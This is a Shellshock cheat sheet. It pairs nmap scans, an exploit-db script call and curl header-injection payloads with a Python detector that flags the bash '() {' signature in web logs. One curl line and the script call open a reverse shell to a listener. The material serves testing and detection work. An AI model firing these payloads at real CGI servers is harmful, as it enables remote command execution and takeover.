ShellShock
Description
Iterate the cgi-bin directory against *.sh, *.pl, *.cgi and *.py.
When one script is found, use the nmap http-shellshock script:
nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
If vulnerable, it is possible to exploit it:
# https://www.exploit-db.com/exploits/34900
shellshock.py payload=reverse rhost=10.10.10.56 lhost=<LAB IP> lport=<port> pages=/cgi-bin/user.sh
Or manually through curl:
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor for it with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-of-band; the Cookie header works as an alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
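The same signature the curl probes above rely on, the bash function-definition prefix `() {` placed in a CGI-exposed header, is what a defender looks for in web server logs. The following is an added example, not code from the original page: it runs that signature over constructed Apache-style log lines; the log layout (combined format plus a trailing quoted Cookie field) and the sample lines are assumptions.

```python
import re

# Bash exports a function as an environment variable whose value starts
# with "() {". The Shellshock bug is that a vulnerable bash keeps parsing
# after the closing brace, so a header value such as "() { :; }; <cmd>"
# is executed when a CGI handler receives the header as an env variable.
# Whitespace between the tokens is optional, so the match is loose.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Assumed log layout (hypothetical): Apache combined log plus the Cookie
# header as one extra quoted field, i.e. the LogFormat
#   "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{Cookie}i\""
# Quoted fields may contain backslash-escaped quotes, hence (?:[^"\\]|\\.)*.
_Q = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>' + _Q + r')" "(?P<ua>' + _Q + r')" "(?P<cookie>' + _Q + r')"$'
)

def is_shellshock_probe(value: str) -> bool:
    """True if a header value carries the bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None

def scan_log_lines(lines):
    """Return one dict per injected header found in the given log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed format; skip rather than guess
        for field in ("referer", "ua", "cookie"):
            if is_shellshock_probe(m.group(field)):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "request": m.group("req"), "header": field,
                             "value": m.group(field)})
    return hits

# Constructed sample lines: two probes (User-Agent and Cookie) and a benign
# browser line whose "(X11; Linux" must not trigger the rule.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Sep/2014:12:00:01 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" '
    '200 512 "-" "() { :; }; echo \\"VULNERABLE TO SHELLSHOCK\\"" "-"',
    '10.0.0.9 - - [24/Sep/2014:12:00:02 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)" "session=abc"',
    '10.0.0.7 - - [24/Sep/2014:12:00:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" '
    '200 0 "-" "curl/7.35.0" "() { :;}; /bin/bash -c \\"sleep 5\\""',
]

if __name__ == "__main__":
    for h in scan_log_lines(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["request"]} via {h["header"]}: {h["value"]}')
```

A hit on a request to /cgi-bin with a 200 status is the case to triage first, since that is exactly the path the nmap and curl checks above exercise.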